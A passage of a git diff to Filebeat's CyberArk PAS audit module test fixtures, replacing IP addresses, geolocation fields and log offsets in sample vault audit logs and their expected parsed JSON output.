- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -228,11 +218,11 @@ "cyberarkpas.audit.ca_properties.user_name": "adrian", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:27Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.reason": "For fun and profit", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", @@ -240,11 +230,6 @@ "cyberarkpas.audit.station": "10.0.2.2", "cyberarkpas.audit.timestamp": "Mar 11 09:48:27", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "use password", 
@@ -266,7 +251,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 7323, + "log.offset": 7319, "log.syslog.priority": "5", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -276,7 +261,7 @@ "related.ip": [ "10.0.2.2", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", @@ -302,11 +287,11 @@ "cyberarkpas.audit.ca_properties.user_name": "adrian", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:54:49Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.reason": "Because I say so", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", 
@@ -314,11 +299,6 @@
 "cyberarkpas.audit.station": "10.0.2.2",
 "cyberarkpas.audit.timestamp": "Mar 11 09:54:49",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "destination.user.name": "adrian",
 "event.action": "use password",
@@ -340,7 +320,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 9555,
+ "log.offset": 9549,
 "log.syslog.priority": "5",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -350,7 +330,7 @@
 "related.ip": [
 "10.0.2.2",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -376,11 +356,11 @@ "cyberarkpas.audit.ca_properties.user_name": "adrian", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:56:30Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.reason": "for fun", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", @@ -388,11 +368,6 @@ "cyberarkpas.audit.station": "10.0.2.2", "cyberarkpas.audit.timestamp": "Mar 11 09:56:30", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "use password", @@ -414,7 +389,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 11783, + "log.offset": 11775, "log.syslog.priority": "5", "network.direction": "outbound", "observer.hostname": "VAULT", 
@@ -424,7 +399,7 @@ "related.ip": [ "10.0.2.2", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", @@ -450,11 +425,11 @@ "cyberarkpas.audit.ca_properties.user_name": "adrian", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:23:17Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.reason": "testing", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", @@ -462,11 +437,6 @@ "cyberarkpas.audit.station": "10.0.2.2", "cyberarkpas.audit.timestamp": "Mar 11 12:23:17", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "use password", 
@@ -488,7 +458,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 13993,
+ "log.offset": 13983,
 "log.syslog.priority": "5",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -498,7 +468,7 @@
 "related.ip": [
 "127.0.0.1",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -530,22 +500,17 @@ "cyberarkpas.audit.ca_properties.user_name": "testark", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", - "cyberarkpas.audit.gateway_station": "34.71.250.247", + "cyberarkpas.audit.gateway_station": "81.2.69.143", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:35Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 14 06:49:35", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "use password", 
@@ -567,7 +532,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 16203, + "log.offset": 16191, "log.syslog.priority": "5", "network.direction": "external", "observer.hostname": "VAULT", @@ -576,24 +541,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -615,22 +577,17 @@ "cyberarkpas.audit.ca_properties.user_name": "testark", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", - "cyberarkpas.audit.gateway_station": "34.71.250.247", + "cyberarkpas.audit.gateway_station": "81.2.69.143", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:31:54Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 15 03:31:54", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "use password", 
@@ -652,7 +609,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 19395, + "log.offset": 19377, "log.syslog.priority": "5", "network.direction": "external", "observer.hostname": "VAULT", @@ -661,24 +618,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -704,22 +658,17 @@ "cyberarkpas.audit.ca_properties.user_name": "testark", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", - "cyberarkpas.audit.gateway_station": "34.71.250.247", + "cyberarkpas.audit.gateway_station": "81.2.69.143", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:26Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 15 07:08:26", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "use password", 
@@ -741,7 +690,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 22067, + "log.offset": 22043, "log.syslog.priority": "5", "network.direction": "external", "observer.hostname": "VAULT", @@ -750,24 +699,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -793,22 +739,17 @@ "cyberarkpas.audit.ca_properties.user_name": "testark", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", - "cyberarkpas.audit.gateway_station": "34.71.250.247", + "cyberarkpas.audit.gateway_station": "81.2.69.143", "cyberarkpas.audit.iso_timestamp": "2021-03-16T10:04:49Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 16 03:04:49", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "use password", 
@@ -830,7 +771,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 25521, + "log.offset": 25491, "log.syslog.priority": "5", "network.direction": "external", "observer.hostname": "VAULT", @@ -839,24 +780,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log index 18c5b7e67fbb..ca3e7faa7332 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log 
@@ -1,5 +1,5 @@ <7>1 2021-03-08T18:31:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:31:52","IsoTimestamp":"2021-03-08T18:31:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansr","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} <7>1 2021-03-08T18:32:03Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:03","IsoTimestamp":"2021-03-08T18:32:03Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansra","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} -<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User 
Logon","GatewayStation":""}}} -<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.32.170.205"}}} -<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"34.71.250.247"}}} +<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 
67.43.156.14\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}} +<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 67.43.156.14\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.14"}}} +<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Undefined User Logon\n 81.2.69.143\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User 
Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.2.69.143"}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json index 616c854c567a..d70a1c12d699 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json @@ -114,10 +114,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:43:26Z", "cyberarkpas.audit.issuer": "PSMAdmin", "cyberarkpas.audit.message": "Undefined User Logon", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Undefined User Logon\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Error", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 